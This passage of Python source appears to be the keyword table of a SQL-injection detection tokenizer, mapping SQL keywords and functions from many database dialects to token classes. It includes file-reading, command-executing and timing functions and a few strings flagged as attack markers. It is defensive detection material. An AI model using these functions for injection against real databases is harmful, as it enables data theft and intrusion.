'SYS.FN_MY_PERMISSIONS' : 'f', 'SYS.DATABASE_NAME' : 'n', 'ABORT' : 'k', 'ABS' : 'f', 'ACCESSIBLE' : 'k', 'ACOS' : 'f', 'ADDDATE' : 'f', 'ADDTIME' : 'f', 'AES_DECRYPT' : 'f', 'AES_ENCRYPT' : 'f', 'AGAINST' : 'k', 'AGE' : 'f', 'ALTER' : 'k', # 'ALL_USERS' - oracle 'ALL_USERS' : 'k', 'ANALYZE' : 'k', 'AND' : '&', # ANY -- acts like a function # http://dev.mysql.com/doc/refman/5.0/en/any-in-some-subqueries.html 'ANY' : 'f', # pgsql 'ANYELEMENT' : 't', 'ANYARRAY' : 't', 'ANYNONARRY' : 't', 'CSTRING' : 't', # array_... pgsql 'ARRAY_AGG' : 'f', 'ARRAY_CAT' : 'f', 'ARRAY_NDIMS' : 'f', 'ARRAY_DIM' : 'f', 'ARRAY_FILL' : 'f', 'ARRAY_LENGTH' : 'f', 'ARRAY_LOWER' : 'f', 'ARRAY_UPPER' : 'f', 'ARRAY_PREPEND' : 'f', 'ARRAY_TO_STRING' : 'f', 'ARRAY_TO_JSON' : 'f', 'APP_NAME' : 'f', 'APPLOCK_MODE' : 'f', 'APPLOCK_TEST' : 'f', 'ASSEMBLYPROPERTY' : 'f', 'AS' : 'k', 'ASC' : 'k', 'ASCII' : 'f', 'ASENSITIVE' : 'k', 'ASIN' : 'f', 'ASYMKEY_ID' : 'f', 'ATAN' : 'f', 'ATAN2' : 'f', 'AVG' : 'f', 'BEFORE' : 'k', 'BEGIN' : 'T', 'BEGIN GOTO' : 'T', 'BEGIN TRY' : 'T', 'BEGIN TRY DECLARE' : 'T', 'BEGIN DECLARE' : 'T', 'BENCHMARK' : 'f', 'BETWEEN' : 'o', 'BIGINT' : 't', 'BIGSERIAL' : 't', 'BIN' : 'f', # "select binary 1" forward type operator 'BINARY' : 't', 'BINARY_DOUBLE_INFINITY' : '1', 'BINARY_DOUBLE_NAN' : '1', 'BINARY_FLOAT_INFINITY' : '1', 'BINARY_FLOAT_NAN' : '1', 'BINBINARY' : 'f', 'BIT_AND' : 'f', 'BIT_COUNT' : 'f', 'BIT_LENGTH' : 'f', 'BIT_OR' : 'f', 'BIT_XOR' : 'f', 'BLOB' : 'k', # pgsql 'BOOL_AND' : 'f', # pgsql 'BOOL_OR' : 'f', 'BOOLEAN' : 't', 'BOTH' : 'k', # pgsql 'BTRIM' : 'f', 'BY' : 'n', 'BYTEA' : 't', # MS ACCESS # # 'CBOOL' : 'f', 'CBYTE' : 'f', 'CCUR' : 'f', 'CDATE' : 'f', 'CDBL' : 'f', 'CINT' : 'f', 'CLNG' : 'f', 'CSNG' : 'f', 'CVAR' : 'f', # CHANGES: sqlite3 'CHANGES' : 'f', 'CHDIR' : 'f', 'CHDRIVE' : 'f', 'CURDIR' : 'f', 'FILEDATETIME' : 'f', 'FILELEN' : 'f', 'GETATTR' : 'f', 'MKDIR' : 'f', 'SETATTR' : 'f', 'DAVG' : 'f', 'DCOUNT' : 'f', 'DFIRST' : 'f', 'DLAST' : 'f', 'DLOOKUP' : 'f', 'DMAX' : 'f', 'DMIN' : 'f', 'DSUM' : 'f', # TBD 'DO' : 'n', 'CALL' : 'T', 'CASCADE' : 'k', 'CASE' : 'E', 'CAST' : 'f', # pgsql 'cube root' lol 'CBRT' : 'f', 'CEIL' : 'f', 'CEILING' : 'f', 'CERTENCODED' : 'f', 'CERTPRIVATEKEY' : 'f', 'CERT_ID' : 'f', 'CERT_PROPERTY' : 'f', 'CHANGE' : 'k', # 'CHAR' # sometimes a function too # TBD 'CHAR' : 'f', 'CHARACTER' : 't', 'CHARACTER_LENGTH' : 'f', 'CHARINDEX' : 'f', 'CHARSET' : 'f', 'CHAR_LENGTH' : 'f', # mysql keyword but not clear how used 'CHECK' : 'n', 'CHECKSUM_AGG' : 'f', 'CHOOSE' : 'f', 'CHR' : 'f', 'CLOCK_TIMESTAMP' : 'f', 'COALESCE' : 'f', 'COERCIBILITY' : 'f', 'COL_LENGTH' : 'f', 'COL_NAME' : 'f', 'COLLATE' : 'A', 'COLLATION' : 'f', 'COLLATIONPROPERTY' : 'f', # TBD 'COLUMN' : 'k', 'COLUMNPROPERTY' : 'f', 'COLUMNS_UPDATED' : 'f', 'COMPRESS' : 'f', 'CONCAT' : 'f', 'CONCAT_WS' : 'f', 'CONDITION' : 'k', 'CONNECTION_ID' : 'f', 'CONSTRAINT' : 'k', 'CONTINUE' : 'k', 'CONV' : 'f', 'CONVERT' : 'f', # pgsql 'CONVERT_FROM' : 'f', # pgsql 'CONVERT_TO' : 'f', 'CONVERT_TZ' : 'f', 'COS' : 'f', 'COT' : 'f', 'COUNT' : 'f', 'COUNT_BIG' : 'k', 'CRC32' : 'f', 'CREATE' : 'E', 'CREATE OR' : 'n', 'CREATE OR REPLACE' : 'T', 'CROSS' : 'n', 'CUME_DIST' : 'f', 'CURDATE' : 'f', 'CURRENT_DATABASE' : 'f', # MYSQL Dual, function or variable-like # And IBM # http://publib.boulder.ibm.com/infocenter/iseries/v5r4/index.jsp?topic=%2Fsqlp%2Frbafykeyu.htm 'CURRENT_DATE' : 'v', 'CURRENT_TIME' : 'v', 'CURRENT_TIMESTAMP' : 'v', 'CURRENT_QUERY' : 'f', 'CURRENT_SCHEMA' : 'f', 'CURRENT_SCHEMAS' : 'f', 'CURRENT_SETTING' : 'f', # current_user sometimes acts like a variable # other times it acts like a function depending # on database. This is converted in the right # type in the folding code # mysql = function # ?? = variable 'CURRENT_USER' : 'v', 'CURRENTUSER' : 'f', # # DB2 'Special Registers' # These act like variables # http://publib.boulder.ibm.com/infocenter/iseries/v5r4/index.jsp?topic=%2Fsqlp%2Frbafykeyu.htm 'CURRENT DATE' : 'v', 'CURRENT DEGREE' : 'v', 'CURRENT_PATH' : 'v', 'CURRENT PATH' : 'v', 'CURRENT FUNCTION' : 'v', 'CURRENT SCHEMA' : 'v', 'CURRENT_SERVER' : 'v', 'CURRENT SERVER' : 'v', 'CURRENT TIME' : 'v', 'CURRENT_TIMEZONE' : 'v', 'CURRENT TIMEZONE' : 'v', 'CURRENT FUNCTION PATH': 'v', # pgsql 'CURRVAL' : 'f', 'CURSOR' : 'k', 'CURSOR_STATUS' : 'f', 'CURTIME' : 'f', # this might be a function 'DATABASE' : 'n', 'DATABASE_PRINCIPAL_ID' : 'f', 'DATABASEPROPERTYEX' : 'f', 'DATABASES' : 'k', 'DATALENGTH' : 'f', 'DATE' : 'f', 'DATEDIFF' : 'f', # sqlserver 'DATENAME' : 'f', #sqlserver 'DATEPART' : 'f', 'DATEADD' : 'f', 'DATESERIAL' : 'f', 'DATEVALUE' : 'f', 'DATEFROMPARTS' : 'f', 'DATETIME2FROMPARTS' : 'f', 'DATETIMEFROMPARTS' : 'f', # sqlserver 'DATETIMEOFFSETFROMPARTS' : 'f', 'DATE_ADD' : 'f', 'DATE_FORMAT' : 'f', 'DATE_PART' : 'f', 'DATE_SUB' : 'f', 'DATE_TRUNC' : 'f', 'DAY' : 'f', 'DAYNAME' : 'f', 'DAYOFMONTH' : 'f', 'DAYOFWEEK' : 'f', 'DAYOFYEAR' : 'f', 'DAY_HOUR' : 'k', 'DAY_MICROSECOND' : 'k', 'DAY_MINUTE' : 'k', 'DAY_SECOND' : 'k', 'DB_ID' : 'f', 'DB_NAME' : 'f', 'DEC' : 'k', 'DECIMAL' : 't', # can only be used after a ';' 'DECLARE' : 'T', 'DECODE' : 'f', 'DECRYPTBYASMKEY' : 'f', 'DECRYPTBYCERT' : 'f', 'DECRYPTBYKEY' : 'f', 'DECRYPTBYKEYAUTOCERT' : 'f', 'DECRYPTBYPASSPHRASE' : 'f', 'DEFAULT' : 'k', 'DEGREES' : 'f', 'DELAY' : 'k', 'DELAYED' : 'k', 'DELETE' : 'T', 'DENSE_RANK' : 'f', 'DESC' : 'k', 'DESCRIBE' : 'k', 'DES_DECRYPT' : 'f', 'DES_ENCRYPT' : 'f', 'DETERMINISTIC' : 'k', 'DIFFERENCE' : 'f', 'DISTINCTROW' : 'k', 'DISTINCT' : 'k', 'DIV' : 'o', 'DOUBLE' : 't', 'DROP' : 'T', 'DUAL' : 'n', 'EACH' : 'k', 'ELSE' : 'k', 'ELSEIF' : 'k', 'ELT' : 'f', 'ENCLOSED' : 'k', 'ENCODE' : 'f', 'ENCRYPT' : 'f', 'ENCRYPTBYASMKEY' : 'f', 'ENCRYPTBYCERT' : 'f', 'ENCRYPTBYKEY' : 'f', 'ENCRYPTBYPASSPHRASE' : 'f', # # sqlserver 'EOMONTH' : 'f', # pgsql 'ENUM_FIRST' : 'f', 'ENUM_LAST' : 'f', 'ENUM_RANGE' : 'f', # special MS-ACCESS operator # http://office.microsoft.com/en-001/access-help/table-of-operators-HA010235862.aspx 'EQV' : 'o', 'ESCAPED' : 'k', # DB2, others.. # http://publib.boulder.ibm.com/infocenter/iseries/v5r4/index.jsp?topic=%2Fsqlp%2Frbafykeyu.htm 'EXCEPT' : 'U', # TBD #'END' : 'k', # 'EXEC', 'EXECUTE' - MSSQL # http://msdn.microsoft.com/en-us/library/ms175046.aspx 'EXEC' : 'T', 'EXECUTE' : 'T', 'EXISTS' : 'f', 'EXIT' : 'k', 'EXP' : 'f', 'EXPLAIN' : 'k', 'EXPORT_SET' : 'f', 'EXTRACT' : 'f', 'EXTRACTVALUE' : 'f', 'EXTRACT_VALUE' : 'f', 'EVENTDATA' : 'f', 'FALSE' : '1', 'FETCH' : 'k', 'FIELD' : 'f', 'FILE_ID' : 'f', 'FILE_IDEX' : 'f', 'FILE_NAME' : 'f', 'FILEGROUP_ID' : 'f', 'FILEGROUP_NAME' : 'f', 'FILEGROUPPROPERTY' : 'f', 'FILEPROPERTY' : 'f', # http://www-01.ibm.com/support/knowledgecenter/#!/SSGU8G_11.50.0/com.ibm.sqls.doc/ids_sqs_1526.htm 'FILETOBLOB' : 'f', 'FILETOCLOB' : 'f', 'FIND_IN_SET' : 'f', 'FIRST_VALUE' : 'f', 'FLOAT' : 't', 'FLOAT4' : 't', 'FLOAT8' : 't', 'FLOOR' : 'f', 'FN_VIRTUALFILESTATS' : 'f', 'FORCE' : 'k', 'FOREIGN' : 'k', 'FOR' : 'n', 'FORMAT' : 'f', 'FOUND_ROWS' : 'f', 'FROM' : 'k', # MySQL 5.6 'FROM_BASE64' : 'f', 'FROM_DAYS' : 'f', 'FROM_UNIXTIME' : 'f', 'FUNCTION' : 'k', 'FULLTEXT' : 'k', 'FULLTEXTCATALOGPROPERTY' : 'f', 'FULLTEXTSERVICEPROPERTY' : 'f', # pgsql 'GENERATE_SERIES' : 'f', # pgsql 'GENERATE_SUBSCRIPTS' : 'f', # sqlserver 'GETDATE' : 'f', # sqlserver 'GETUTCDATE' : 'f', # pgsql 'GET_BIT' : 'f', # pgsql 'GET_BYTE' : 'f', 'GET_FORMAT' : 'f', 'GET_LOCK' : 'f', 'GO' : 'T', 'GOTO' : 'T', 'GRANT' : 'k', 'GREATEST' : 'f', 'GROUP' : 'n', 'GROUPING' : 'f', 'GROUPING_ID' : 'f', 'GROUP_CONCAT' : 'f', # MYSQL http://dev.mysql.com/doc/refman/5.6/en/handler.html 'HANDLER' : 'T', 'HAS_PERMS_BY_NAME' : 'f', 'HASHBYTES' : 'f', # # 'HAVING' - MSSQL 'HAVING' : 'B', 'HEX' : 'f', 'HIGH_PRIORITY' : 'k', 'HOUR' : 'f', 'HOUR_MICROSECOND' : 'k', 'HOUR_MINUTE' : 'k', 'HOUR_SECOND' : 'k', # 'HOST_NAME' -- transact-sql 'HOST_NAME' : 'f', 'IDENT_CURRENT' : 'f', 'IDENT_INCR' : 'f', 'IDENT_SEED' : 'f', 'IDENTIFY' : 'f', # 'IF - if is normally a function, except in TSQL # http://msdn.microsoft.com/en-us/library/ms182717.aspx 'IF' : 'f', 'IF EXISTS' : 'f', 'IF NOT' : 'f', 'IF NOT EXISTS' : 'f', 'IFF' : 'f', 'IFNULL' : 'f', 'IGNORE' : 'k', 'IIF' : 'f', # IN is a special case.. sometimes a function, sometimes a keyword # corrected inside the folding code 'IN' : 'k', 'INDEX' : 'k', 'INDEX_COL' : 'f', 'INDEXKEY_PROPERTY' : 'f', 'INDEXPROPERTY' : 'f', 'INET_ATON' : 'f', 'INET_NTOA' : 'f', 'INFILE' : 'k', # pgsql 'INITCAP' : 'f', 'INNER' : 'k', 'INOUT' : 'k', 'INSENSITIVE' : 'k', 'INSERT' : 'E', 'INSERT INTO' : 'T', 'INSERT IGNORE' : 'E', 'INSERT LOW_PRIORITY INTO' : 'T', 'INSERT LOW_PRIORITY' : 'E', 'INSERT DELAYED INTO' : 'T', 'INSERT DELAYED' : 'E', 'INSERT HIGH_PRIORITY INTO' : 'T', 'INSERT HIGH_PRIORITY' : 'E', 'INSERT IGNORE INTO' : 'T', 'INSTR' : 'f', 'INSTRREV' : 'f', 'INT' : 't', 'INT1' : 't', 'INT2' : 't', 'INT3' : 't', 'INT4' : 't', 'INT8' : 't', 'INTEGER' : 't', # INTERSECT - IBM DB2, others # http://publib.boulder.ibm.com/infocenter/iseries/v5r4/index.jsp?topic=%2Fsqlp%2Frbafykeyu.htm 'INTERSECT' : 'U', 'INTERVAL' : 'k', 'INTO' : 'k', 'IS' : 'o', #sqlserver 'ISDATE' : 'f', 'ISEMPTY' : 'f', # pgsql 'ISFINITE' : 'f', 'ISNULL' : 'f', 'ISNUMERIC' : 'f', 'IS_FREE_LOCK' : 'f', # # 'IS_MEMBER' - MSSQL 'IS_MEMBER' : 'f', 'IS_ROLEMEMBER' : 'f', 'IS_OBJECTSIGNED' : 'f', # 'IS_SRV...' MSSQL 'IS_SRVROLEMEMBER' : 'f', 'IS_USED_LOCK' : 'f', 'ITERATE' : 'k', 'JOIN' : 'k', 'JSON_KEYS' : 'f', 'JULIANDAY' : 'f', # pgsql 'JUSTIFY_DAYS' : 'f', 'JUSTIFY_HOURS' : 'f', 'JUSTIFY_INTERVAL' : 'f', 'KEY_ID' : 'f', 'KEY_GUID' : 'f', 'KEYS' : 'k', 'KILL' : 'k', 'LAG' : 'f', 'LAST_INSERT_ID' : 'f', 'LAST_INSERT_ROWID' : 'f', 'LAST_VALUE' : 'f', 'LASTVAL' : 'f', 'LCASE' : 'f', 'LEAD' : 'f', 'LEADING' : 'k', 'LEAST' : 'f', 'LEAVE' : 'k', 'LEFT' : 'f', 'LENGTH' : 'f', 'LIKE' : 'o', 'LIMIT' : 'B', 'LINEAR' : 'k', 'LINES' : 'k', 'LN' : 'f', 'LOAD' : 'k', 'LOAD_EXTENSION' : 'f', 'LOAD_FILE' : 'f', # MYSQL http://dev.mysql.com/doc/refman/5.6/en/load-data.html 'LOAD DATA' : 'T', 'LOAD XML' : 'T', # MYSQL function vs. variable 'LOCALTIME' : 'v', 'LOCALTIMESTAMP' : 'v', 'LOCATE' : 'f', 'LOCK' : 'n', 'LOG' : 'f', 'LOG10' : 'f', 'LOG2' : 'f', 'LONGBLOB' : 'k', 'LONGTEXT' : 'k', 'LOOP' : 'k', 'LOWER' : 'f', 'LOWER_INC' : 'f', 'LOWER_INF' : 'f', 'LOW_PRIORITY' : 'k', 'LPAD' : 'f', 'LTRIM' : 'f', 'MAKEDATE' : 'f', 'MAKE_SET' : 'f', 'MASKLEN' : 'f', 'MASTER_BIND' : 'k', 'MASTER_POS_WAIT' : 'f', 'MASTER_SSL_VERIFY_SERVER_CERT': 'k', 'MATCH' : 'k', 'MAX' : 'f', 'MAXVALUE' : 'k', 'MD5' : 'f', 'MEDIUMBLOB' : 'k', 'MEDIUMINT' : 'k', 'MEDIUMTEXT' : 'k', 'MERGE' : 'k', 'MICROSECOND' : 'f', 'MID' : 'f', 'MIDDLEINT' : 'k', 'MIN' : 'f', 'MINUTE' : 'f', 'MINUTE_MICROSECOND' : 'k', 'MINUTE_SECOND' : 'k', 'MOD' : 'o', 'MODE' : 'n', 'MODIFIES' : 'k', 'MONEY' : 't', 'MONTH' : 'f', 'MONTHNAME' : 'f', 'NAME_CONST' : 'f', 'NATURAL' : 'n', 'NETMASK' : 'f', 'NEXTVAL' : 'f', 'NOT' : 'o', # UNARY OPERATOR 'NOTNULL' : 'k', 'NOW' : 'f', # oracle http://www.shift-the-oracle.com/sql/select-for-update.html 'NOWAIT' : 'k', 'NO_WRITE_TO_BINLOG' : 'k', 'NTH_VALUE' : 'f', 'NTILE' : 'f', # NULL is treated as "variable" type # Sure it's a keyword, but it's really more # like a number or value. # but we don't want it folded away # since it's a good indicator of SQL # ('true' and 'false' are also similar) 'NULL' : 'v', # unknown is mysql keyword, again treat # as 'v' type 'UNKNOWN' : 'v', 'NULLIF' : 'f', 'NUMERIC' : 't', # MSACCESS 'NZ' : 'f', 'OBJECT_DEFINITION' : 'f', 'OBJECT_ID' : 'f', 'OBJECT_NAME' : 'f', 'OBJECT_SCHEMA_NAME' : 'f', 'OBJECTPROPERTY' : 'f', 'OBJECTPROPERTYEX' : 'f', 'OCT' : 'f', 'OCTET_LENGTH' : 'f', 'OFFSET' : 'k', 'OID' : 't', 'OLD_PASSWORD' : 'f', # need to investigate how used #'ON' : 'k', 'ONE_SHOT' : 'k', # obviously not SQL but used in attacks 'OWN3D' : 'k', # 'OPEN' # http://msdn.microsoft.com/en-us/library/ms190500.aspx 'OPEN' : 'k', # 'OPENDATASOURCE' # http://msdn.microsoft.com/en-us/library/ms179856.aspx 'OPENDATASOURCE' : 'f', 'OPENXML' : 'f', 'OPENQUERY' : 'f', 'OPENROWSET' : 'f', 'OPTIMIZE' : 'k', 'OPTION' : 'k', 'OPTIONALLY' : 'k', 'OR' : '&', 'ORD' : 'f', 'ORDER' : 'n', 'ORIGINAL_DB_NAME' : 'f', 'ORIGINAL_LOGIN' : 'f', # is a mysql reserved word but not really used 'OUT' : 'n', 'OUTER' : 'n', 'OUTFILE' : 'k', # unusual PGSQL operator that looks like a function 'OVERLAPS' : 'f', # pgsql 'OVERLAY' : 'f', 'PARSENAME' : 'f', 'PARTITION' : 'k', # 'PARTITION BY' IBM DB2 # http://publib.boulder.ibm.com/infocenter/iseries/v5r4/index.jsp?topic=%2Fsqlp%2Frbafykeyu.htm 'PARTITION BY' : 'B', # keyword "SET PASSWORD", and a function 'PASSWORD' : 'n', 'PATINDEX' : 'f', 'PATHINDEX' : 'f', 'PERCENT_RANK' : 'f', 'PERCENTILE_COUNT' : 'f', 'PERCENTILE_DISC' : 'f', 'PERCENTILE_RANK' : 'f', 'PERIOD_ADD' : 'f', 'PERIOD_DIFF' : 'f', 'PERMISSIONS' : 'f', 'PG_ADVISORY_LOCK' : 'f', 'PG_BACKEND_PID' : 'f', 'PG_CANCEL_BACKEND' : 'f', 'PG_CREATE_RESTORE_POINT' : 'f', 'PG_RELOAD_CONF' : 'f', 'PG_CLIENT_ENCODING' : 'f', 'PG_CONF_LOAD_TIME' : 'f', 'PG_LISTENING_CHANNELS' : 'f', 'PG_HAS_ROLE' : 'f', 'PG_IS_IN_RECOVERY' : 'f', 'PG_IS_OTHER_TEMP_SCHEMA' : 'f', 'PG_LS_DIR' : 'f', 'PG_MY_TEMP_SCHEMA' : 'f', 'PG_POSTMASTER_START_TIME' : 'f', 'PG_READ_FILE' : 'f', 'PG_READ_BINARY_FILE' : 'f', 'PG_ROTATE_LOGFILE' : 'f', 'PG_STAT_FILE' : 'f', 'PG_SLEEP' : 'f', 'PG_START_BACKUP' : 'f', 'PG_STOP_BACKUP' : 'f', 'PG_SWITCH_XLOG' : 'f', 'PG_TERMINATE_BACKEND' : 'f', 'PG_TRIGGER_DEPTH' : 'f', 'PI' : 'f', 'POSITION' : 'f', 'POW' : 'f', 'POWER' : 'f', 'PRECISION' : 'k', # http://msdn.microsoft.com/en-us/library/ms176047.aspx 'PRINT' : 'T', 'PRIMARY' : 'k', 'PROCEDURE' : 'k', 'PROCEDURE ANALYSE' : 'f', 'PUBLISHINGSERVERNAME' : 'f', 'PURGE' : 'k', 'PWDCOMPARE' : 'f', 'PWDENCRYPT' : 'f', 'QUARTER' : 'f', 'QUOTE' : 'f', # pgsql 'QUOTE_IDENT' : 'f', 'QUOTENAME' : 'f', # pgsql 'QUOTE_LITERAL' : 'f', # pgsql 'QUOTE_NULLABLE' : 'f', 'RADIANS' : 'f', 'RAND' : 'f', 'RANDOM' : 'f', # http://msdn.microsoft.com/en-us/library/ms178592.aspx 'RAISEERROR' : 'E', # 'RANDOMBLOB' - sqlite3 'RANDOMBLOB' : 'f', 'RANGE' : 'k', 'RANK' : 'f', 'READ' : 'k', 'READS' : 'k', 'READ_WRITE' : 'k', # 'REAL' only used in data definition 'REAL' : 't', 'REFERENCES' : 'k', # pgsql, mariadb 'REGEXP' : 'o', 'REGEXP_INSTR' : 'f', 'REGEXP_REPLACE' : 'f', 'REGEXP_MATCHES' : 'f', 'REGEXP_SUBSTR' : 'f', 'REGEXP_SPLIT_TO_TABLE' : 'f', 'REGEXP_SPLIT_TO_ARRAY' : 'f', 'REGPROC' : 't', 'REGPROCEDURE' : 't', 'REGOPER' : 't', 'REGOPERATOR' : 't', 'REGCLASS' : 't', 'REGTYPE' : 't', 'REGCONFIG' : 't', 'REGDICTIONARY' : 't', 'RELEASE' : 'k', 'RELEASE_LOCK' : 'f', 'RENAME' : 'k', 'REPEAT' : 'k', # keyword and function 'REPLACE' : 'k', 'REPLICATE' : 'f', 'REQUIRE' : 'k', 'RESIGNAL' : 'k', 'RESTRICT' : 'k', 'RETURN' : 'k', 'REVERSE' : 'f', 'REVOKE' : 'k', # RIGHT JOIN vs. RIGHT() # tricky since it's a function in pgsql # needs review 'RIGHT' : 'n', 'RLIKE' : 'o', 'ROUND' : 'f', 'ROW' : 'f', 'ROW_COUNT' : 'f', 'ROW_NUMBER' : 'f', 'ROW_TO_JSON' : 'f', 'RPAD' : 'f', 'RTRIM' : 'f', 'SCHEMA' : 'k', 'SCHEMA_ID' : 'f', 'SCHAMA_NAME' : 'f', 'SCHEMAS' : 'k', 'SCOPE_IDENTITY' : 'f', 'SECOND_MICROSECOND' : 'k', 'SEC_TO_TIME' : 'f', 'SELECT' : 'E', 'SENSITIVE' : 'k', 'SEPARATOR' : 'k', 'SERIAL' : 't', 'SERIAL2' : 't', 'SERIAL4' : 't', 'SERIAL8' : 't', 'SERVERPROPERTY' : 'f', 'SESSION_USER' : 'f', 'SET' : 'E', 'SETSEED' : 'f', 'SETVAL' : 'f', 'SET_BIT' : 'f', 'SET_BYTE' : 'f', 'SET_CONFIG' : 'f', 'SET_MASKLEN' : 'f', 'SHA' : 'f', 'SHA1' : 'f', 'SHA2' : 'f', 'SHOW' : 'n', 'SHUTDOWN' : 'T', 'SIGN' : 'f', 'SIGNBYASMKEY' : 'f', 'SIGNBYCERT' : 'f', 'SIGNAL' : 'k', 'SIMILAR' : 'k', 'SIN' : 'f', 'SLEEP' : 'f', # # sqlserver 'SMALLDATETIMEFROMPARTS' : 'f', 'SMALLINT' : 't', 'SMALLSERIAL' : 't', # SOME -- acts like a function # http://dev.mysql.com/doc/refman/5.0/en/any-in-some-subqueries.html 'SOME' : 'f', 'SOUNDEX' : 'f', 'SOUNDS' : 'o', 'SPACE' : 'f', 'SPATIAL' : 'k', 'SPECIFIC' : 'k', 'SPLIT_PART' : 'f', 'SQL' : 'k', 'SQLEXCEPTION' : 'k', 'SQLSTATE' : 'k', 'SQLWARNING' : 'k', 'SQL_BIG_RESULT' : 'k', 'SQL_BUFFER_RESULT' : 'k', 'SQL_CACHE' : 'k', 'SQL_CALC_FOUND_ROWS' : 'k', 'SQL_NO_CACHE' : 'k', 'SQL_SMALL_RESULT' : 'k', 'SQL_VARIANT_PROPERTY' : 'f', 'SQLITE_VERSION' : 'f', 'SQRT' : 'f', 'SSL' : 'k', 'STARTING' : 'k', #pgsql 'STATEMENT_TIMESTAMP' : 'f', 'STATS_DATE' : 'f', 'STDDEV' : 'f', 'STDDEV_POP' : 'f', 'STDDEV_SAMP' : 'f', 'STRAIGHT_JOIN' : 'k', 'STRCMP' : 'f', # STRCOMP: MS ACCESS 'STRCOMP' : 'f', 'STRCONV' : 'f', # pgsql 'STRING_AGG' : 'f', 'STRING_TO_ARRAY' : 'f', 'STRPOS' : 'f', 'STR_TO_DATE' : 'f', 'STUFF' : 'f', 'SUBDATE' : 'f', 'SUBSTR' : 'f', 'SUBSTRING' : 'f', 'SUBSTRING_INDEX' : 'f', 'SUBTIME' : 'f', 'SUM' : 'f', 'SUSER_ID' : 'f', 'SUSER_SID' : 'f', 'SUSER_SNAME' : 'f', 'SUSER_NAME' : 'f', 'SYSDATE' : 'f', # sql server 'SYSDATETIME' : 'f', # sql server 'SYSDATETIMEOFFSET' : 'f', # 'SYSCOLUMNS' # http://msdn.microsoft.com/en-us/library/aa26039s8(v=sql.80).aspx 'SYSCOLUMNS' : 'k', # 'SYSOBJECTS' # http://msdn.microsoft.com/en-us/library/aa260447(v=sql.80).aspx 'SYSOBJECTS' : 'k', # 'SYSUSERS' - MSSQL # TBD 'SYSUSERS' : 'k', # sqlserver 'SYSUTCDATETME' : 'f', 'SYSTEM_USER' : 'f', 'SWITCHOFFET' : 'f', # 'TABLE' # because SQLi really can't use 'TABLE' # change from keyword to none 'TABLE' : 'n', 'TAN' : 'f', 'TERMINATED' : 'k', 'TERTIARY_WEIGHTS' : 'f', 'TEXT' : 't', # TEXTPOS PGSQL 6.0 # remnamed to strpos in 7.0 # http://www.postgresql.org/message-id/20000601091055.A20245@rice.edu 'TEXTPOS' : 'f', 'TEXTPTR' : 'f', 'TEXTVALID' : 'f', 'THEN' : 'k', # TBD 'TIME' : 'k', 'TIMEDIFF' : 'f', 'TIMEFROMPARTS' : 'f', # pgsql 'TIMEOFDAY' : 'f', # ms access 'TIMESERIAL' : 'f', 'TIMEVALUE' : 'f', 'TIMESTAMP' : 't', 'TIMESTAMPADD' : 'f', 'TIME_FORMAT' : 'f', 'TIME_TO_SEC' : 'f', 'TINYBLOB' : 'k', 'TINYINT' : 'k', 'TINYTEXT' : 'k', # # sqlserver 'TODATETIMEOFFSET' : 'f', # pgsql 'TO_ASCII' : 'f', # MySQL 5.6 'TO_BASE64' : 'f', # 'TO_CHAR' -- oracle, pgsql 'TO_CHAR' : 'f', # pgsql 'TO_HEX' : 'f', 'TO_DAYS' : 'f', 'TO_DATE' : 'f', 'TO_NUMBER' : 'f', 'TO_SECONDS' : 'f', 'TO_TIMESTAMP' : 'f', # sqlite3 'TOTAL' : 'f', 'TOTAL_CHANGES' : 'f', 'TOP' : 'k', # 'TRAILING' -- only used in TRIM(TRAILING # http://www.w3resource.com/sql/character-functions/trim.php 'TRAILING' : 'n', # pgsql 'TRANSACTION_TIMESTAMP' : 'f', 'TRANSLATE' : 'f', 'TRIGGER' : 'k', 'TRIGGER_NESTLEVEL' : 'f', 'TRIM' : 'f', 'TRUE' : '1', 'TRUNC' : 'f', 'TRUNCATE' : 'f', # sqlserver 'TRY' : 'T', 'TRY_CAST' : 'f', 'TRY_CONVERT' : 'f', 'TRY_PARSE' : 'f', 'TYPE_ID' : 'f', 'TYPE_NAME' : 'f', 'TYPEOF' : 'f', 'TYPEPROPERTY' : 'f', 'UCASE' : 'f', # pgsql -- used in weird unicode string # it's an operator so its' gets folded away 'UESCAPE' : 'o', 'UNCOMPRESS' : 'f', 'UNCOMPRESS_LENGTH' : 'f', 'UNDO' : 'k', 'UNHEX' : 'f', 'UNICODE' : 'f', 'UNION' : 'U', # 'UNI_ON' -- odd variation that comes up 'UNI_ON' : 'U', # 'UNIQUE' # only used as a function (DB2) or as "CREATE UNIQUE" 'UNIQUE' : 'n', 'UNIX_TIMESTAMP' : 'f', 'UNLOCK' : 'k', 'UNNEST' : 'f', 'UNSIGNED' : 'k', 'UPDATE' : 'E', 'UPDATEXML' : 'f', 'UPPER' : 'f', 'UPPER_INC' : 'f', 'UPPER_INF' : 'f', 'USAGE' : 'k', 'USE' : 'T', # transact-sql function # however treating as a 'none' type # since 'user_id' is such a common column name # TBD 'USER_ID' : 'n', 'USER_NAME' : 'n', # 'USER' -- a MySQL function # handled in folding step 'USER' : 'n', 'USING' : 'f', # next 3 TBD 'UTC_DATE' : 'k', 'UTC_TIME' : 'k', 'UTC_TIMESTAMP' : 'k', 'UUID' : 'f', 'UUID_SHORT' : 'f', 'VALUES' : 'k', 'VARBINARY' : 'k', 'VARCHAR' : 't', 'VARCHARACTER' : 'k', 'VARIANCE' : 'f', 'VAR' : 'f', 'VARP' : 'f', 'VARYING' : 'k', 'VAR_POP' : 'f', 'VAR_SAMP' : 'f', 'VERIFYSIGNEDBYASMKEY' : 'f', 'VERIFYSIGNEDBYCERT' : 'f', 'VERSION' : 'f', 'VOID' : 't', # oracle http://www.shift-the-oracle.com/sql/select-for-update.html 'WAIT' : 'k', 'WAITFOR' : 'n', 'WEEK' : 'f', 'WEEKDAY' : 'f', 'WEEKDAYNAME' : 'f', 'WEEKOFYEAR' : 'f', 'WHEN' : 'k', 'WHERE' : 'k', 'WHILE' : 'T', # pgsql 'WIDTH_BUCKET' : 'f', # it's a keyword, but it's too ordinary in English 'WITH' : 'n', # XML... oracle, pgsql 'XMLAGG' : 'f', 'XMLELEMENT' : 'f', 'XMLCOMMENT' : 'f', 'XMLCONCAT' : 'f', 'XMLFOREST' : 'f', 'XMLFORMAT' : 'f', 'XMLTYPE' : 'f', 'XMLPI' : 'f', 'XMLROOT' : 'f', 'XMLEXISTS' : 'f', 'XML_IS_WELL_FORMED' : 'f', 'XPATH' : 'f', 'XPATH_EXISTS' : 'f', 'XOR' : '&', 'XP_EXECRESULTSET' : 'k', 'YEAR' : 'f', 'YEARWEEK' : 'f', 'YEAR_MONTH' : 'k', 'ZEROBLOB' : 'f', 'ZEROFILL' : 'k', 